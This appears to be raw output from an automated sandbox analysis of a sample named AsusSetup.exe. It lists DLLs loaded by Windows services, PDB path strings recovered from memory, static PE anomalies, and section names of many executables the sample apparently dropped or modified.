Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
Source: AsusSetup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: AsusSetup.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: AsusSetup.exeStatic file information: File size 5251072 > 1048576
Source: AsusSetup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x203c00
Source: AsusSetup.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x18d000
Source: AsusSetup.exeStatic PE information: More than 200 imports for USER32.dll
Source: AsusSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.2150436994.0000000003080000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2690809228.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2861757838.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, plugin-container.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2834736372.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: msdtcexe.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2419515500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2407189666.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: chrome_pwa_launcher.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: alg.exe, 00000003.00000003.2814896754.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: alg.exe, 00000003.00000003.2678114905.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: default-browser-agent.pdb source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2917096647.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
Source: msdtc.exe.0.drStatic PE information: real checksum: 0x2f054 should be: 0x16b97b
Source: armsvc.exe.0.drStatic PE information: section name: .didat
Source: alg.exe.0.drStatic PE information: section name: .didat
Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
Source: elevation_service.exe.0.drStatic PE information: section name: .00cfg
Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
Source: msdtc.exe.0.drStatic PE information: section name: .didat
Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.3.drStatic PE information: section name: .gehcont
Source: unpack200.exe.3.drStatic PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.drStatic PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.3.drStatic PE information: section name: .gehcont
Source: cookie_exporter.exe.3.drStatic PE information: section name: .00cfg
Source: cookie_exporter.exe.3.drStatic PE information: section name: .gxfg
Source: cookie_exporter.exe.3.drStatic PE information: section name: .retplne
Source: cookie_exporter.exe.3.drStatic PE information: section name: _RDATA
Source: identity_helper.exe.3.drStatic PE information: section name: .00cfg
Source: identity_helper.exe.3.drStatic PE information: section name: .gxfg
Source: identity_helper.exe.3.drStatic PE information: section name: .retplne
Source: identity_helper.exe.3.drStatic PE information: section name: _RDATA
Source: identity_helper.exe.3.drStatic PE information: section name: malloc_h
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: section name: .retplne
Source: Acrobat.exe.3.drStatic PE information: section name: .didat
Source: Acrobat.exe.3.drStatic PE information: section name: _RDATA
Source: AcroCEF.exe.3.drStatic PE information: section name: .didat
Source: AcroCEF.exe.3.drStatic PE information: section name: _RDATA
Source: setup.exe.3.drStatic PE information: section name: .00cfg
Source: setup.exe.3.drStatic PE information: section name: .gxfg
Source: setup.exe.3.drStatic PE information: section name: .retplne
Source: setup.exe.3.drStatic PE information: section name: LZMADEC
Source: setup.exe.3.drStatic PE information: section name: _RDATA
Source: setup.exe.3.drStatic PE information: section name: malloc_h
Source: msedgewebview2.exe.3.drStatic PE information: section name: .00cfg
Source: msedgewebview2.exe.3.drStatic PE information: section name: .gxfg
Source: msedgewebview2.exe.3.drStatic PE information: section name: .retplne
Source: msedgewebview2.exe.3.drStatic PE information: section name: CPADinfo
Source: msedgewebview2.exe.3.drStatic PE information: section name: LZMADEC
Source: msedgewebview2.exe.3.drStatic PE information: section name: _RDATA
Source: msedgewebview2.exe.3.drStatic PE information: section name: malloc_h
Source: msedge_proxy.exe.3.drStatic PE information: section name: .00cfg
Source: msedge_proxy.exe.3.drStatic PE information: section name: .gxfg
Source: msedge_proxy.exe.3.drStatic PE information: section name: .retplne
Source: msedge_proxy.exe.3.drStatic PE information: section name: _RDATA
Source: msedge_proxy.exe.3.drStatic PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.3.drStatic PE information: section name: malloc_h
Source: notification_click_helper.exe.3.drStatic PE information: section name: .00cfg
Source: notification_click_helper.exe.3.drStatic PE information: section name: .gxfg
Source: notification_click_helper.exe.3.drStatic PE information: section name: .retplne
Source: notification_click_helper.exe.3.drStatic PE information: section name: CPADinfo
Source: notification_click_helper.exe.3.drStatic PE information: section name: _RDATA
Source: notification_click_helper.exe.3.drStatic PE information: section name: malloc_h
Source: pwahelper.exe.3.drStatic PE information: section name: .00cfg
Source: pwahelper.exe.3.drStatic PE information: section name: .gxfg
Source: pwahelper.exe.3.drStatic PE information: section name: .retplne
Source: pwahelper.exe.3.drStatic PE information: section name: _RDATA
Source: pwahelper.exe.3.drStatic PE information: section name: malloc_h
Source: msedge_proxy.exe0.3.drStatic PE information: section name: .00cfg
Source: msedge_proxy.exe0.3.drStatic PE information: section name: .gxfg
Source: msedge_proxy.exe0.3.drStatic PE information: section name: .retplne
Source: msedge_proxy.exe0.3.drStatic PE information: section name: _RDATA
Source: msedge_proxy.exe0.3.drStatic PE information: section name: malloc_h
Source: pwahelper.exe0.3.drStatic PE information: section name: .00cfg
Source: pwahelper.exe0.3.drStatic PE information: section name: .gxfg
Source: pwahelper.exe0.3.drStatic PE information: section name: .retplne
Source: pwahelper.exe0.3.drStatic PE information: section name: _RDATA
Source: pwahelper.exe0.3.drStatic PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: section name: .didat
Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.3.drStatic PE information: section name: _RDATA
Source: AcroCEF.exe0.3.drStatic PE information: section name: .didat
